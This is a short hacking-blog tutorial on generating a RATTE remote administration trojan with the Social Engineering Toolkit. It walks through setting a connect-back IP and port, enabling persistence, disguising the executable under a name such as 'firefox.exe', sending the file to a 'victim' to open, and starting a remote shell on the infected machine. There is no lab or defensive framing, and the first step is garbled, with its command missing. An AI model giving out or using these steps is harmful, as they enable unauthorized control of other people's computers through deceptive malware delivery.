A remote administration tool (RAT) is a piece of software that allows a remote operator to control a system as if it has physical access to that system. While desktop sharing and remote administration have many legal uses, RAT software is usually associated with the criminal or malicious activity. using RAT you can control Remote P.C., there are lots of software available for RAT, but they are made from hackers, there is the possibility of back-door in that readily available software. Showing you use of RAT through Social engineering toolkit (S.E.T).
Follow Some Given Steps using remote administration tool:
1. Open your terminal & type
2. update your set.
3. Now select option 3 which is Third party Modules.
4. Now select option 2 which is RATTE (Remote administration tool tommy edition).
5. Enter I.P. Address of your computer to connect back.
6. Port RATTE Server should listen on : press enter.
7. Should RATTE be persistent [no|yes]?:yes
8. Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe.
9. Payload has been exported to src/program_junk/ratteM.exe
10. Now send your ratteM.exe files to victim, as soon as they download and open it
Start the ratteserver listener now [yes|no]:yes
11. chose 1 option which is list client
12. if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here
Now choose option2 “activate client”
Now you get menu with lots of menu. Select 1st option which is start shell.
Register To Hackchefs For Latest Updates
For Feedback, queries or any help you can comment or Contact Us
For More Updates And Information Visit Our Website
And Like And Share Our Facebook Page